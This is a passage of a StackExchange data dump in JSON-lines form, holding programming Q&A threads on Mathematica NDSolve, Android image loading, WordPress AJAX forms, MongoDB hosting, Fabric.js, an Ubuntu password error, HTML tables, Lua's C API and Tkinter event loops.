with standard deviation sigma. \nI find that changing the size of the domain slightly has a dramatic (non-physical) effect on the solution evaluated at a finite time. Why is this? Why don't I get a warning from Mathematica? 
This code reproduces the problem:\n<code>sigma = 1\/32;\nT = 10;\nx0 = 1;\nL = 24;\nsol1 = NDSolve[{D[pn[x, t], {t, 1}] == 1\/8 D[pn[x, t], {x, 2}], \npn[0, t] == 0, pn[L, t] == 0, \npn[x, 0] == 1\/Sqrt[2 Pi sigma^2] Exp[-(x - x0)^2\/(2 sigma^2)]}, \npn[x, t], {x, 0, L}, {t, 0, T}];\nL = 26;\nsol2 = NDSolve[{D[pn[x, t], {t, 1}] == 1\/8 D[pn[x, t], {x, 2}], \npn[0, t] == 0, pn[L, t] == 0, \npn[x, 0] == 1\/Sqrt[2 Pi sigma^2] Exp[-(x - x0)^2\/(2 sigma^2)]}, \npn[x, t], {x, 0, L}, {t, 0, T}];\nt = T;\nGraphicsRow[{Plot[Evaluate[pn[x, t] \/. sol1], {x, 0, 24}, \nPlotRange -> All], \nPlot[Evaluate[pn[x, t] \/. sol2], {x, 0, 26}, PlotRange -> All]}]\n<\/code>\nOn the left I plot the solution with domain size L=24, on the right I plot the solution with L=26. As you can see, the change is dramatic (notice the y axis values) and Mathematica produces no warning.\nHow can I solve this issue and be able to solve the equation numerically for L larger than 24?\nComment: Tip; Setting the variable of integration `t` to a numeric value with `t = T` messes things up when you (or I) recompute the solutions. It's very inconvenient. You can avoid needing such a workaround by solving for `pn` instead of `pn[x, t]` in your `NDSolve` calls. Alternatively, you could use the code `pn[x, t] \/. sol \/. t -> T`.\nAnswer: You have control the quality of the grid\/mesh of the spatial variable. Either with <code>\"MaxStepSize\"<\/code>:\n<code>NDSolve[{D[ppn[x, t], {t, 1}] == 1\/8 D[ppn[x, t], {x, 2}], \n ppn[0, t] == 0, ppn[L, t] == 0, \n ppn[x, 0] == \n 1\/Sqrt[2 Pi sigma^2] Exp[-(x - x0)^2\/(2 sigma^2)]}, ppn, {x, 0, \n L}, {t, 0, T},\n Method -> {\"MethodOfLines\", \n \"SpatialDiscretization\" -> {\"TensorProductGrid\", \n \"MaxStepSize\" -> 1}}]\n<\/code>\nor with <code>\"MinPoints\"<\/code>:\n<code>NDSolve[{D[ppn[x, t], {t, 1}] == 1\/8 D[ppn[x, t], {x, 2}], \n ppn[0, t] == 0, ppn[L, t] == 0, \n ppn[x, 0] == \n 1\/Sqrt[2 Pi sigma^2] Exp[-(x - x0)^2\/(2 sigma^2)]}, ppn, {x, 0, \n L}, {t, 0, T},\n Method -> {\"MethodOfLines\", \n \"SpatialDiscretization\" -> {\"TensorProductGrid\", \n \"MinPoints\" -> Ceiling@L}}]\n<\/code>\n","meta":{"source":"mathematica.stackexchange","title":"ndsolve solution goes to zero for large domain","dup_signals":{}},"subset":"stackexchange"} +{"text":"Issue in loading images from web\n\nQuestion: I am new in android and had developed an app which get images from the website and display it. I got it working in emulator but not in real phones. In some device, it will crash or take very long loading period. Can anyone please help me or guide me in improving it as i'm not sure whether the way i loads the images is correct or not.\nHere are the code i use to get the images from the web and display accordingly. \n<code>if (xmlURL.length() != 0) {\n\n try {\n URL url = new URL(xmlURL);\n SAXParserFactory spf = SAXParserFactory.newInstance();\n SAXParser sp = spf.newSAXParser();\n\n\/* Get the XMLReader of the SAXParser we created. *\/\nXMLReader xr = sp.getXMLReader();\n\/*\n * Create a new ContentHandler and apply it to the\n * XML-Reader\n *\/\nxr.setContentHandler(myExampleHandler);\n\n\/* Parse the xml-data from our URL. *\/\nxr.parse(new InputSource(url.openStream()));\n\/* Parsing has finished. 
*\/\n\n\/*\n * Our ExampleHandler now provides the parsed data to\n * us.\n *\/\nParsedExampleDataSet parsedExampleDataSet = myExampleHandler.getParsedData();\n\n } catch (Exception e) {\n\n }\n }\n\n if (s.equalsIgnoreCase(\"wallpapers\")) {\n Context context = helloAndroid.this.getBaseContext();\n\n for (int j = 0; j <= myExampleHandler.filenames.size() - 1; j++) {\n if (myExampleHandler.filenames.elementAt(j).toString() != null) {\n helloAndroid.this.ed = myExampleHandler.thumbs.elementAt(j)\n .toString();\n if (helloAndroid.this.ed.length() != 0) {\n Drawable image = ImageOperations(context,\n helloAndroid.this.ed, \"image.jpg\");\n file_info = myExampleHandler.filenames\n .elementAt(j).toString();\n author = \"\\nby \"\n + myExampleHandler.authors.elementAt(j)\n .toString();\n switch (j + 1) {\n case 1:\n ImageView imgView1 = new ImageView(context);\n imgView1 = (ImageView) findViewById(R.id.image1);\n if (image.getIntrinsicHeight() > 0) {\n imgView1.setImageDrawable(image);\n } else\n imgView1\n .setImageResource(R.drawable.empty_wallpaper);\n tv = (TextView) findViewById(R.id.filename1);\n tv.setText(file_info);\n tv = (TextView) findViewById(R.id.author1);\n tv.setText(author);\n imgView1\n .setOnClickListener(new View.OnClickListener() {\n public void onClick(View view) {\n \/\/ Perform action on click\n Intent myIntent1 = new Intent(\n helloAndroid.this,\n galleryFile.class);\n Bundle b = new Bundle();\n b.putString(\"fileID\",myExampleHandler.fileid.elementAt(0).toString());\n b.putString(\"page\", \"1\");\n b.putString(\"family\", s);\n b.putString(\"fi\",myExampleHandler.folder_id.elementAt(folder).toString());\n b.putString(\"kw\", keyword);\n myIntent1.putExtras(b);\n startActivityForResult(\n myIntent1, 0);\n }\n });\n break;\n case 2:\n ImageView imgView2 = new ImageView(context);\n imgView2 = (ImageView) findViewById(R.id.image2);\n imgView2.setImageDrawable(image);\n tv = (TextView) findViewById(R.id.filename2);\n tv.setText(file_info);\n tv = (TextView) findViewById(R.id.author2);\n tv.setText(author);\n imgView2\n .setOnClickListener(new View.OnClickListener() {\n public void onClick(View view) {\n \/\/ Perform action on click\n Intent myIntent1 = new Intent(\n helloAndroid.this,\n galleryFile.class);\n Bundle b = new Bundle();\n b.putString(\"fileID\",myExampleHandler.fileid.elementAt(1).toString());\n b.putString(\"page\", \"1\");\n b.putString(\"family\", s);\n b.putString(\"fi\",myExampleHandler.folder_id.elementAt(folder).toString());\n b.putString(\"kw\", keyword);\n myIntent1.putExtras(b);\n startActivityForResult(\n myIntent1, 0);\n }\n });\n break;\n case 3:\n \/\/same code\n break;\n }\n }\n}\n\n }\n }\n private Drawable ImageOperations(Context ctx, String url,\n String saveFilename) {\n try {\n InputStream is = (InputStream) this.fetch(url);\n Drawable d = Drawable.createFromStream(is, \"src\");\n return d;\n } catch (MalformedURLException e) {\n e.printStackTrace();\n return null;\n } catch (IOException e) {\n e.printStackTrace();\n return null;\n }\n }\n\n public Object fetch(String address) throws MalformedURLException,\n IOException {\n URL url = new URL(address);\n Object content = url.getContent();\n return content;\n }\n<\/code>\nComment: are your images in XML format, then? or why do you use the SAXParser?\nComment: The XML is for grabbing the url.\n\nIt might have something to do with the actual Internet Connection Speed. 
\n\nTry running the image grabber in a separate thread.\nComment: the xml is to retrieve the image info.\nComment: i had try to load the images with different thread but fail. Can you provide me some guidance? Thanks a lot.\nComment: could you provide the logcat content from the crashes? It would help to narrow down the problem to see the exception you get.\nComment: i am sorry as i do not have the log cat now as it crashes on mobile device and not in my emulator. Thus i could not get the log cat.\nAnswer: Yes, you can get logcat from your device are you aware of how to connect to usb and push the file over via adb commands?\nComment: erm... i am not aware of it. however, i do not have the device with me as well as i send my apps to testers from other countries. Is there any other ways i could get the logcat or how can i get the logcat from the mobile owner?\nComment: do a google search there are two or more libs that allow you to do that..ie get logcat and error trace form mobile device user to debug via putting those libs i n your application and calling a few methods..\n\nTwo libs Log Collector and stack trace collector\n\nLink for stack trace:\n\nhttp:\/\/code.google.com\/p\/android-remote-stacktrace\n\nYou will l need to set Read.logs in your manifest and of course internet permission so you can get the error report via http form the user\nComment: Ok.. Thanks a lot. i will try to get the log cat and update it here. =)\nComment: By the way, can you all teach me on how to modify my code so that i can grab my images in separate thread? ask i had try previously got cant make it right. I want to put it in another thread is because i want to display a loading image while it is loading.\nComment: search the main android dev blog Romain Guy did a blog post on that several months ago or search anddev.org forums\n","meta":{"source":"stackoverflow","title":"Issue in loading images from web","dup_signals":{}},"subset":"stackexchange"} +{"text":"Send multiple contact form from one page via AJAX\n\nQuestion: I have 3 contact form in one page ( Header, Body, Footer ). The code works correctly if sent from one form. I want to use one AJAX request for all forms. That is, when you click on the submit button, so that the code checks if this form then send data to php. How can i do it right? 
I use the <code>hasClass ()<\/code> method of jquery, but I have errors in the console\nHTML:\nFooter Form\n<code><form id=\"contact-form1\" method=\"POST\" class=\"d-flex form\">\n <input type=\"text\" class=\"simple-input\" id=\"name\" placeholder=\"Name\">\n <input type=\"text\" class=\"simple-input\" id=\"email\" placeholder=\"Email address\">\n <textarea class=\"quession-input\" id=\"msg\" placeholder=\"Your question\"><\/textarea>\n <div class=\"checkboks custom-sq\">\n <input type=\"checkbox\" class=\"checked-checkbox\" name=\"myCheckboxes[]\" id=\"box1\" checked=\"checked\" value=\"true\" \/>\n <label for=\"box1\" class=\"checkboks-text\"><?php echo the_field('checkbox_text', 'option'); ?><\/label>\n <\/div>\n <button type=\"submit\" id=\"submit\" class=\"danger-btn submit1\"><?php echo the_field('btn_send', 'option'); ?><\/button>\n<\/form>\n<\/code>\nAnother Form\n<code><form id=\"contact-form\" method=\"POST\" class=\"d-flex form\">\n <input type=\"text\" class=\"simple-input\" id=\"hy_name\" placeholder=\"Name\">\n <input type=\"text\" class=\"simple-input\" id=\"hy_email\" placeholder=\"Email address\">\n <textarea class=\"quession-input\" id=\"hy_msg\" placeholder=\"Your question\"><\/textarea>\n <div class=\"checkboks custom-sq\">\n <input type=\"checkbox\" id=\"box3\" class=\"checked-checkbox\" checked=\"checked\" \/>\n <label for=\"box3\" class=\"checkboks-text\"><?php echo the_field('checkbox_text', 'option'); ?><\/label>\n <\/div>\n <button type=\"submit\" id=\"submit\" class=\"danger-btn hy-submit submit2\"><?php echo the_field('btn_send', 'option'); ?><\/button>\n<\/form>\n<\/code>\njQuery:\n<code>jQuery('#submit').on('click', function(e) {\n e.preventDefault();\n if(e.hasClass('submit1')) {\n var name = jQuery('#name').val();\n var email = jQuery('#email').val();\n var msg = jQuery('#msg').val();\n var subj = jQuery('#subj').val(); \n var data = \"action=send_email&name=\" + name + \"&email=\" + email + \"&msg=\" + msg + \"&subj=\" + subj + \"&myCheckboxes=\" + choice, \n } elseif (e.hasClass('submit2')) {\n var hy_name = jQuery('#hy_name').val();\n var hy_email = jQuery('#hy_email').val();\n var hy_msg = jQuery('#hy_msg').val();\n var data = \"action=send_email&name=\" + hy_name + \"&email=\" + hy_email + \"&msg=\" + hy_msg + \"&myCheckboxes=\" + choice, \n\n }\n validateEmail(email);\n if (msg == '' || email == '' || validateEmail(jQuery('#email').val()) == false) {\n validateEmail(email);\n validateText(jQuery('#msg'));\n validateText(jQuery('#name'));\n return false;\n }\n\n var chkElem = document.getElementsByName(\"myCheckboxes[]\");\n var choice =\"\";\n\n for(var i=0; i< chkElem.length; i++)\n {\n if(chkElem[i].checked)\n choice = choice + chkElem[i].value;\n }\n\n jQuery.ajax({\n type: \"post\",\n url: \"\/wp-admin\/admin-ajax.php\",\n data: data;\n success: function (response) {\n jQuery('#contact-form input').val('');\n jQuery('#contact-form textarea').val('');\n jQuery('.submit').text('Done!');\n },\n error: function (jqXHR, textStatus, errorThrown) {\n console.log(textStatus);\n }\n });\n\n});\n<\/code>\nPHP:\n<code>add_action('wp_ajax_nopriv_send_email', 'send_email');\nadd_action('wp_ajax_send_email', 'send_email');\nfunction send_email() {\n\n $checkbox = $_POST['myCheckboxes'];\n if (isset($checkbox)) {\n echo $checkbox;\n }\n $headers = 'Content-Type: text\/html; charset=\"utf-8\"';\n $name = $_POST['name'];\n $hy_name = $_POST['hy_name'];\n $from = 'email@example.com';\n $to = 'email@example.com';\n $email = $_POST['email'];\n $hy_email = 
$_POST['hy_email'];\n $msg = $_POST['msg'];\n $hy_msg = $_POST['hy_msg'];\n $subject = 'Footer form: ' . $_POST['email'];\n $message .= (!empty($name)) ? '<p><strong>User Name<\/strong> : ' . $name .' <\/p>' : '';\n $message .= (!empty($email)) ? '<p><strong>User Email<\/strong> : '. $email .'<\/p>' : '';\n $message .= (!empty($msg)) ? '<p><strong>User Message<\/strong> : '.$msg .'<\/p>' : '';\n $message .= (!empty($checkbox)) ? '<p><strong>Checkboxs<\/strong> : '.$checkbox .'<\/p>' : '';\n $message .= '<\/body><\/html>';\n echo mail($to, $subject, $message, $headers);\n return $msg;\n die();\n}\n<\/code>\nComment: ___but I have errors in the console___ WHat errors, please show us\nComment: An `id` in html has to be UNIQUE on the page, you are using `id=\"submit\"` for both buttons\nComment: @RiggsFolly But how do I do it right? You can not use one id? but when pressed checked from what form is sent?\nAnswer: You can use method <code>serialize()<\/code>, and use a class to identifique buttons submit. Using two identical ids on one page is not good practice.\nIf you use the class <code>.submit<\/code> per example in each button submit:\n<code>$('.submit').on('click', function(e) {\n e.preventDefault();\n var data = $(this).closest('form').serialize();\n\n [...]\n}\n<\/code>\n","meta":{"source":"stackoverflow","title":"Send multiple contact form from one page via AJAX","dup_signals":{}},"subset":"stackexchange"} +{"text":"Heroku mLab MongoDB add-on vs MongoDB Atlas\n\nQuestion: I am using MongoDB Atlas with my Heroku app.\nI have seen that there is an mLab MongoDB add-on on Heroku, as mLab is part MongoDB Atlas now, was is the advantage of using this add-on ?\nMoreover, the add-on looks like a more expensive solution than MongoDB Atlas...\nAnswer: You should use the new MongoDB Atlas Heroku app. mLab heroku app will be deprecated when the migration done, see the doc from migrating from mLab to Atlas\n\nMongoDB plans to build an integration between MongoDB Atlas and Heroku. You will be able to continue to use mLab via its add-on at Heroku until the new integration is available.\nComment: This is not really answering my question: I am already using Heroku and Atlas without add-on on my app, my question is what is the advantage to link Heroku and Atlas with the mLab add-on?\nAnswer: Now this add on feature is no more useful as mlab has already been acquired by MongoDB.\nEarlier the purpose of this feature was that the mLab Add-on used to be co-located with your application in case you have selected this option and could help in reducing the latency of your application as <code>mlab<\/code> was available primarily in US regions.\nBut now mlab has been acquired by MongoDB and you can deploy Atlas cluster in the same region of your application to reduce the latency.\nI hope this answer your question.\n","meta":{"source":"stackoverflow","title":"Heroku mLab MongoDB add-on vs MongoDB Atlas","dup_signals":{}},"subset":"stackexchange"} +{"text":"Fabricjs loadFromJSON performance\n\nQuestion: I have one canvas which can load different pages, how exactly this works on javascript? I have lets say <code>object<\/code> which contain this data and after i change page i am doing something like <code>delete object;<\/code> which i believe free ram so my app can use this again. First 5 pages canvas is smooth and nice but after those with <code>loadFromJSON<\/code> canvas get really heavy, freezing from time to time. 
On mac with safari webpage get more then 600mb RAM, which is not happening on chrome for example but work on canvas feel same laggy on both browsers. If there any way to refresh canvas or something like that?\nAnswer: First to optimise canvas performance you can try to initiate it with <code>renderOnAddRemove: true<\/code> option:\n<code>canvas = new fabric.Canvas('canvasId', {\n renderOnAddRemove: true\n});\n<\/code>\nand then call <code>canvas.renderAll()<\/code> after all needed changes are done.\nComment: You can try, as I said. this property disables redrawing the whole canvas after each object is added\/removed, so that may save resources on that step.\n","meta":{"source":"stackoverflow","title":"Fabricjs loadFromJSON performance","dup_signals":{}},"subset":"stackexchange"} +{"text":"I want to change my administrator password but am receiving an error\"manipulation token authentication error\"\n\nQuestion: \nPossible Duplicate:\nAuthentication token manipulation error \n\nI want to change my ubuntu 11.10 administrator account password but when i am about to do so, i get an error that \"passwd:Manipulation Token Authentication Error\" and then in the next statement get\"passwd:password unchanged\"...So can anyone help me out by finding a solution to this problem?\nComment: read this: http:\/\/askubuntu.com\/questions\/91188\/authentication-token-manipulation-error\nAnswer: In recent versions of Ubuntu, the filesystem is mounted as read-only, so you need to enter the follow command to get it to remount as read-write, which will allow you to make changes : \n<code>mount -o rw,remount \/\n<\/code>\nNot doing this will cause that error.\n","meta":{"source":"askubuntu","title":"I want to change my administrator password but am receiving an error\"manipulation token authentication error\"","dup_signals":{}},"subset":"stackexchange"} +{"text":"HTMl Table Width issue when added new table below to show effect like freeze pane\n\nQuestion: I using the code to create header freeze table but the width of both the tables are not matching. 
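Back on the Fabric.js question above, a hedged sketch of the page-switch pattern that usually keeps memory flat: reuse one canvas, clear it before each <code>loadFromJSON</code>, and render once at the end (the <code>pageJson</code> variable is assumed; <code>clear</code>, <code>dispose</code> and <code>renderOnAddRemove</code> are standard Fabric.js):
<code>
// Sketch, not a guaranteed fix: `delete object` on a plain variable frees nothing by itself;
// the old page's objects only become collectable once the canvas stops referencing them.
var canvas = new fabric.Canvas('canvasId', {
  renderOnAddRemove: false        // false skips the automatic re-render after every add/remove
});

function showPage(pageJson) {
  canvas.clear();                 // drop references to the previous page's objects
  canvas.loadFromJSON(pageJson, function () {
    canvas.renderAll();           // one render after the whole page is in
  });
}

// If the canvas element itself is being torn down, also release its listeners:
// canvas.dispose();
<\/code>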
Here is the Code\n\n<code><div id=\"view_feedback_table\">\n<table id=\"crosstable\" border =1 cellpadding=\"6px\" style=\"margin-top: 30px;TEXT-ALIGN: left;float:left;width:1200px;BORDER-COLLAPSE: collapse;\">\n<thead>\n<tr>\n<th colspan=\"9\" style=\"text-align: center;\">\n<span style=\"color: #1b4a84;font-size: 14px;font-weight: 900;\">Response<\/span>\n<\/th>\n<th style=\"text-align: right;\">\nDownload\n<\/th>\n<\/tr>\n<tr style=\"color: white; background-color: rgb(31, 73, 125);\">\n<th style=\"width: 10%;\">Activity Code<\/th>\n<th style=\"width: 10%;\">No of Completed Associates<\/th>\n<th style=\"width: 10%;\">No of Participants Submitted Feedback<\/th>\n<th style=\"width: 7%;\">Instructor<\/th>\n<th style=\"width: 7%;\">Courseware<\/th>\n<th style=\"width: 7%;\">Environment<\/th>\n<th style=\"width: 8%;\">Learner Support<\/th>\n<th style=\"width: 7%;\">Overall<\/th>\n<th style=\"width: 10%;\">Overall Activity Feedback<\/th>\n<th style=\"width: 8%;\">Overall Activity NPS<\/th>\n<\/tr>\n<\/thead>\n<\/table>\n<table id=\"crosstable\" border =1 cellpadding=\"6px\" style=\"TEXT-ALIGN: left;float:left;width:1200px;BORDER-COLLAPSE: collapse;display: block;max-height: 50px;overflow-y: auto;\">\n<tbody>\n<tr style=\"color: rgb(31, 73, 125); background-color: white;\">\n<td style=\"width: 10%;\">\nActivity_Code1\n<\/td>\n<td style=\"width: 10%;\">No_\n<wbr>of_\n<wbr>Completed_\n<wbr>Associates\n<\/td>\n<td style=\"width: 10%;\">No_\n<wbr>of_\n<wbr>Participants_\n<wbr>Submitted_\n<wbr>Feedback\n<\/td>\n<td style=\"width: 7%;\">Instructor<\/td>\n<td style=\"width: 7%;\">Courseware<\/td>\n<td style=\"width: 7%;\">Environment<\/td>\n<td style=\"width: 8%;\">Learner_\n<wbr>Support\n<\/td>\n<td style=\"width: 7%;\">Overall<\/td>\n<td style=\"width: 10%;\">Overall_\n<wbr>Activity_\n<wbr>Feedback\n<\/td>\n<td style=\"width: 8%;\">Overall_\n<wbr>Activity_\n<wbr>NPS\n<\/td>\n<\/tr>\n<tr style=\"color: rgb(31, 73, 125); background-color: rgb(220, 230, 241);\">\n<td>\nActivity_Code2\n<\/td>\n<td>No_\n<wbr>of_\n<wbr>Completed_\n<wbr>Associates\n<\/td>\n<td>No_\n<wbr>of_\n<wbr>Participants_\n<wbr>Submitted_\n<wbr>Feedback\n<\/td>\n<td>Instructor<\/td>\n<td>Courseware<\/td>\n<td>Environment<\/td>\n<td>Learner_\n<wbr>Support\n<\/td>\n<td>Overall<\/td>\n<td>Overall_\n<wbr>Activity_\n<wbr>Feedback\n<\/td>\n<td>Overall_\n<wbr>Activity_\n<wbr>NPS\n<\/td>\n<\/tr>\n<tr style=\"color: rgb(31, 73, 125); background-color: white;\">\n<td>\nActivity_Code3\n<\/td>\n<td>No_\n<wbr>of_\n<wbr>Completed_\n<wbr>Associates\n<\/td>\n<td>No_\n<wbr>of_\n<wbr>Participants_\n<wbr>Submitted_\n<wbr>Feedback\n<\/td>\n<td>Instructor<\/td>\n<td>Courseware<\/td>\n<td>Environment<\/td>\n<td>Learner_\n<wbr>Support\n<\/td>\n<td>Overall<\/td>\n<td>Overall_\n<wbr>Activity_\n<wbr>Feedback\n<\/td>\n<td>Overall_\n<wbr>Activity_\n<wbr>NPS\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div><\/code>\n\nAny suggestions to make this correct. I need freeze header effect so can't use the same table to adjust the width.\nThanks it worked but still have some minor alignment issue when the auto scroll comes into the picture. 
Is there any way to adjust that one too in the code.\nAnswer: \n\n<code><div style=\"position: fixed;background:#fff;z-index: 999;\">\n <table id=\"crosstable\" cellpadding=\"6px\" border=1 style=\"margin-top: 30px;TEXT-ALIGN: left;width:1200px;\">\n <tbody>\n <tr>\n <td colspan=\"9\" style=\"text-align: center;\">\n <span style=\"color: #1b4a84;font-size: 14px;font-weight: 900;\">L1 Feedback Response<\/span>\n <\/th>\n <td style=\"text-align: right;\">\n <a onclick=\"download excel("default","default","AC")\">\n <img src=\"\/pentaho-style\/1235\/images\/excel icon.png\" title=\"Download\" style=\"height: 24px;\">\n <\/a>\n <\/th>\n <\/tr>\n <tr style=\"color: white;background-color: rgb(31, 73, 125);\/* position: fixed; *\/\">\n <td style=\"width: 10%;\">Activity Code<\/th>\n <td style=\"width: 10%;\">No of Completed Associates<\/th>\n <td style=\"width: 10%;\">No of Participants Submitted Feedback<\/th>\n <td style=\"width: 7%;\">Instructor<\/th>\n <td style=\"width: 7%;\">Courseware<\/th>\n <td style=\"width: 7%;\">Environment<\/th>\n <td style=\"width: 8%;\">Learner Support<\/th>\n <td style=\"width: 7%;\">Overall<\/th>\n <td style=\"width: 10%;\">Overall Activity Feedback<\/th>\n <td style=\"width: 8%;\">Overall Activity NPS<\/th>\n <\/tr>\n <\/tbody>\n <\/table>\n<\/div>\n\n<div style=\"padding-top:125px;\">\n <table id=\"crosstable\" cellpadding=\"6px\" border=1 style=\"TEXT-ALIGN: left;max-height: 500px;width:1200px;\">\n <tbody>\n <tr style=\"color: rgb(31, 73, 125); background-color: white;\">\n <td style=\"width: 10%;\">\n Activity Code2\n <\/td>\n <td style=\"width: 10%;\">No_<wbr>of_<wbr>Completed_<wbr>Associates<\/td>\n <td style=\"width: 10%;\">No_<wbr>of_<wbr>Participants_<wbr>Submitted_<wbr>Feedback<\/td>\n <td style=\"width: 7%;\">Instructor<\/td>\n <td style=\"width: 7%;\">Courseware<\/td>\n <td style=\"width: 7%;\">Environment<\/td>\n <td style=\"width: 8%;\">Learner_<wbr>Support<\/td>\n <td style=\"width: 7%;\">Overall<\/td>\n <td style=\"width: 10%;\">Overall_<wbr>Activity_<wbr>Feedback<\/td>\n <td style=\"width: 8%;\">Overall_<wbr>Activity_<wbr>NPS<\/td>\n <\/tr>\n <\/tbody>\n <\/table>\n<\/div><\/code>\n\n<code><td><\/code> content with \"underscores\" like <code>No_of_Participants_Submitted_Feedback<\/code> are unbreakable, therefore it would push the width of the columns. So you might want to use space instead of underscores.\nIf you must have the underscores, add <code><wbr><\/code> after every underscore like this <code>No_<wbr>of_<wbr>Participants_<wbr>Submitted_<wbr>Feedback<\/code>.\nAlso note that you missed <code>%<\/code> in <code><td style=\"width: 7;\">Environment<\/td><\/code>.\nJust by doing this, you would see a huge change in your result, then you can tweak your codes to match perfectly.\nComment: how to avoid the width to push even though underscores are present ?\nComment: Add `` after every \"underscore\" like this `No_of_Completed_Associates`\nComment: It working but stil some align issue is there... you can preview in code snippet\nComment: I've added code snippet. 
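As an aside to the two-table approach being discussed: when only vertical scrolling needs a frozen header, a single table with <code>position: sticky</code> sidesteps the width mismatch entirely, because header and body share the same columns. A minimal hedged sketch (only two columns shown; the wrapper class is made up):
<code>
<div class="table-scroll" style="max-height: 300px; overflow-y: auto;">
  <table style="width: 1200px; border-collapse: collapse;" border="1" cellpadding="6px">
    <thead>
      <tr>
        <!-- sticky pins the header row while the tbody scrolls underneath it -->
        <th style="position: sticky; top: 0; background-color: rgb(31,73,125); color: white; width: 10%;">Activity Code</th>
        <th style="position: sticky; top: 0; background-color: rgb(31,73,125); color: white; width: 7%;">Instructor</th>
        <!-- ...remaining header cells... -->
      </tr>
    </thead>
    <tbody>
      <tr><td>Activity_Code1</td><td>Instructor</td></tr>
      <!-- ...data rows... -->
    </tbody>
  </table>
</div>
<\/code>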
Note that `position:fixed` would only works for vertical scroll and won't work for horizontal scroll.\nComment: Hi i have updated the code, now just minor scroll issue can be adjust that one too ?\n","meta":{"source":"stackoverflow","title":"HTMl Table Width issue when added new table below to show effect like freeze pane","dup_signals":{}},"subset":"stackexchange"} +{"text":"Iterate a lua table in c with a custom pair function\n\nQuestion: I'd like to use the Ordered Table Simple example, I found at the lua-wiki site. Here's the link.\nIn Lua it iterates fine with this:\n<code>for i,v in t:opairs() do\n print( i,v )\nend\n<\/code>\nInstead iterating in lua, I want pass <code>t<\/code> to a C method and iterate the table there. In the C API I found only <code>lua_next<\/code> for the original <code>pairs<\/code> iterator. How can I iterate this lua code in C ?\nAnswer: What you can do is write a custom <code>next<\/code> C function that mimics <code>lua_next<\/code> but works on that ordered table instead having <code>opairs<\/code> method.\n<code>int luaL_orderednext(luaState *L)\n{\n luaL_checkany(L, -1); \/\/ previous key\n luaL_checktype(L, -2, LUA_TTABLE); \/\/ self\n luaL_checktype(L, -3, LUA_TFUNCTION); \/\/ iterator\n lua_pop(L, 1); \/\/ pop the key since \n \/\/ opair doesn't use it\n\n \/\/ iter(self)\n lua_pushvalue(L, -2);\n lua_pushvalue(L, -2);\n lua_call(L, 1, 2);\n\n if(lua_isnil(L, -2))\n {\n lua_pop(L, 2);\n return 0;\n }\n return 2;\n}\n<\/code>\nYou can then use it in C similar to <code>lua_next<\/code>:\n<code>int orderedtraverse(luaState *L)\n{\n lua_settop(L, 1);\n luaL_checktype(L, 1, LUA_TTABLE);\n\n \/\/ t:opairs()\n lua_getfield(L, 1, \"opairs\");\n lua_pushvalue(L, -2);\n lua_call(L, 1, 2);\n\n \/\/ iter, self (t), nil\n for(lua_pushnil(L); luaL_orderednext(L); lua_pop(L, 1))\n {\n printf(\"%s - %s\\n\", \n lua_typename(L, lua_type(L, -2)), \n lua_typename(L, lua_type(L, -1)));\n }\n return 0;\n}\n<\/code>\nNote, I didn't test this but it should work.\n","meta":{"source":"stackoverflow","title":"Iterate a lua table in c with a custom pair function","dup_signals":{}},"subset":"stackexchange"} +{"text":"Does Tkinter have a fixed or repeating update loop that I can use?\n\nQuestion: I have a GUI running in the main thread with a second thread constantly taking input from a shared Queue. Multiple background threads are doing different processes and the second thread takes all of their output and updates the GUI. So far, no problems have come about, but there are countless warnings Tkinter is not thread safe.\nWith that being the case, I can copy all of this code into another constant loop, but I can't find out where I could put it so it's also in the main thread and does not lock up the GUI. What is the right way to do this?\nThanks.\nComment: Tk and tkinter are more thread safe than some people claim. My experiments and issues on the tracker show that updating widgets in threads works much better on 3.x than with 2.x. That said, periodically reading a Queue to update widgets can probably be done more efficiently in an properly timed root.after function than in a separate thread as calling a function is faster than a thread switch.\nComment: @TerryJanReedy, could you elaborate a bit? I think I understand the after function after looking at the documentation, but the function populating the queue in a separate thread is doing so very quickly. 
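For the Lua/C answer earlier on this page, the C functions still have to be registered before Lua can call them; a hedged registration sketch for Lua 5.2+ (the module name <code>ordered</code> is made up, and note that the answer's <code>luaState</code> would need to be spelled <code>lua_State</code> to compile):
<code>
#include <lua.h>
#include <lauxlib.h>

/* forward declarations of the functions from the answer, with the corrected type name */
int luaL_orderednext(lua_State *L);
int orderedtraverse(lua_State *L);

/* expose only the traversal entry point; luaL_orderednext stays a C-side helper */
static const luaL_Reg ordered_funcs[] = {
    {"traverse", orderedtraverse},
    {NULL, NULL}
};

int luaopen_ordered(lua_State *L) {      /* loaded from Lua with require("ordered") */
    luaL_newlib(L, ordered_funcs);       /* Lua 5.2+; use luaL_register on 5.1 */
    return 1;
}
<\/code>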
So if I only read the queue every 50 or 100 ms, then I'd have to skip to the most recent entry of the queue for the widget to display accurately. Any suggestions on how to do that?\nComment: Searching SO for \"[tkinter] root.after\" will give you lots of example answers. ... If values are generated only for display, then the function should be slowed (by sleeping between values). For readability, 1 change per second is about the limit. For emptying a queue, see the queue for the 'I am empty' signal.\nAnswer: Tkinter has an event loop that runs. You can leverage that by writing a function that continuously adds itself to the event queue periodically.\nThe solution looks roughly like this:\n<code>def some_func():\n\n <do your work here>\n\n # call this function again in 1 second\n root.after(1000, some_func)\n<\/code>\nOnce you call it once, it will continue to be called once a second. In production code you'll need to add a bit of bulletproofing, such as checking a flag that gets set when the app is shutting down.\nThis isn't exactly recursion, so you don't have to worry about running out of stack space since all this does is adds a new job in the event queue to run no sooner than one second after it was placed in the queue.\nComment: So I tried running it with 0 and the program never launches. If I run it with 1, it works, but I was hoping it was something that just gets updated every time Tkinter is going through it's loop which should be a lot per second. My only comparison to what I want is game programming with unity, there's a function called Update() thats provided and it runs over and over and over again as long as the game is running.\nComment: @user3000724: using zero starves the system. It's so busy running your code that it doesn't have a chance to service normal events. From a practical standpoint, you shouldn't run it much faster than every 100ms or so, or your UI will appear to lag. There's a single event queue that gets processed by `mainloop` so you need to be mindful of that. Do you really need your function to run more than 1000 times per second?\nComment: If one saves the id returned by root.after (`global after_id; after_id = root.after(...)`), then one can call `root.after_cancel(after_id)` in the shutdown function. Seems cleaner to me.\nComment: @BryanOakley, I'm using paramiko for a large sftp transfer so I'm using a callback function. The function gets called very frequently (I have no idea how to estimate it if its 10 or 1000 times a second) where it just prints to console the % completed. I now have it pushing the int value to a Queue in a background thread and in the main gui thread It's setup to constantly read form the queue and use that int value to update a ttk.Progressbar. I'm not sure if there's a better system for it. Like I said, it works now, but if there's a cleaner way to do it, I want to learn it.\nComment: @user3000724: if all you're doing is updating a progress bar, once a second is plenty fast enough. Do you really think a user cares about the difference between 20 